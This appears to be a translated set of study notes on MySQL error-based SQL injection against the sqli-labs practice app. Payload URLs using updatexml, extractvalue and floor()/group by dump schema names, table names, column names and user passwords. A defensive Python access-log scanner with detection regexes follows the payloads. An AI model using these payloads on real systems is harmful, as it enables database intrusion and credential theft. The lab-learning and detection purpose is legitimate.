Error-based injection workflow:
1. Determine whether an injection point exists
2. Construct invalid syntax to trigger an error
3. Use an error-reporting function: updatexml, extractvalue, floor(), exp(), etc.
SQL error-based injection: how the extractvalue and updatexml errors work:
Reposted from: https://www.cnblogs.com/laoxiajiadeyun/p/10488731.html?spm=a2c4e.10696291.0.0.4a3c19a4xQumaw
Ten error-based injection methods:
Reposted from: https://www.cnblogs.com/wocalieshenmegui/p/5917967.html
updatexml: "update" means it updates, "xml" is eXtensible Markup Language;
Description: returns the replaced XML fragment
It is a function with query capability (it evaluates an XPath expression), which is what makes it usable for querying
payload:
updatexml(xml_document, XPath_string, new_value)
Dump the database name:
updatexml: 0x3a (a colon) is used because it is a syntax error in XPath
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x3a,database(),0x3a),1) --+
Dump table names:
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' ),0x7e),1) --+
Dump column names:
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
Dump data:
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x7e,(select group_concat(id,0x7e,username,0x7e,password) from security.users),0x7e),1) --+
extractvalue:
Description: extracts a value from an XML string using XPath notation
xml_document: the XML markup
XPath_string: the XPath expression; the statement injected here is what gets displayed in the error
new_value: the new value (this argument belongs to updatexml only)
Dump the database name:
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,concat(database())))
Dump table names:
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,concat((select group_concat(table_name) from information_schema.tables where table_schema='security'))))
Dump column names:
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,concat((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))
Dump data:
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,(select group_concat(id,0x7e,username,0x7e,password) from security.users)))
floor() error-based injection:
https://www.cnblogs.com/litlife/p/8472323.html explains floor().
Strictly speaking, the error comes from the conflict between floor(), count() and group by.
Dump the database name:
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from(select count(*),concat(database(),0x7e,floor(rand(0)*2))x from information_schema.tables group by x) a)
Dump table names:
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from (select count(*),concat('~',(select table_name from information_schema.tables where table_schema='security' limit 3,1),'~',floor(rand(0)*2)) as a from information_schema.tables group by a)b) --+
Dump column names:
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from (select count(*),concat('~',(select column_name from information_schema.columns where table_schema='security' limit 5,1),'~',floor(rand(0)*2)) as a from information_schema.tables group by a)b) --+
Dump data (the original was missing the comma after the first '~'):
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from (select count(*) ,concat('~',(select concat(username,";",password,";") from security.users limit 5,1),floor(rand(0)*2))x from security.users group by x)a)
If the output is truncated:
substring(database(),5,10)
*substring is the string-slicing function,*
*string is the string to slice,*
*it takes ten characters starting from the fifth character of the string*
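From the defender's side, the three techniques above leave very recognisable fingerprints in web-server access logs. The following Python snippet is an added example (not code from the original notes, from sqli-labs, or from the reposted articles): it URL-decodes each query parameter and flags updatexml/extractvalue calls, the floor(rand(0)*2) ... group by pattern, and information_schema reads. The regexes and the three log lines are my own constructions; the log format is assumed to be Apache/nginx combined format.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Fingerprints of the three MySQL error-based techniques: XPath-error functions,
# and the floor(rand(0)*2) GROUP BY duplicate-key trick. Matched after full URL decoding.
SIGNATURES = {
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "floor_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(.*?\)\s*\*\s*2\s*\).*?group\s+by", re.I | re.S),
}
# All three variants enumerate tables/columns through information_schema.
INFO_SCHEMA = re.compile(r"information_schema\s*\.\s*(tables|columns)", re.I)
# Combined-format request line: client IP, method + URL, HTTP status (assumed format).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def classify_request(url: str) -> dict:
    """Return the error-based injection techniques found in one request URL."""
    parts = urlsplit(url)
    hits = set()
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote_plus(value)  # second decode catches double-encoded payloads
        for name, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.add(name)
        if INFO_SCHEMA.search(value):
            hits.add("schema_enumeration")
    return {"path": parts.path, "techniques": sorted(hits)}


def scan_access_log(lines) -> list:
    """Return one finding per access-log line whose request matches a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the scan
        result = classify_request(m.group(2))
        if result["techniques"]:
            findings.append({"client": m.group(1), "status": int(m.group(3)), **result})
    return findings


# Constructed sample log (not real traffic): a benign request, then the updatexml
# and floor()/GROUP BY payloads from this page, URL-encoded as a browser would send them.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli/Less-2/?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/Less-2/?id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)%20--+ HTTP/1.1" 200 640',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/Less-2/?id=1%20and%20(select%201%20from(select%20count(*),concat(database(),0x7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 655',
]
```

Running `scan_access_log(SAMPLE_LOG)` returns two findings for client 10.0.0.9 and none for the benign request; the real fix on the application side remains parameterised queries, since the signatures only detect what has already been attempted.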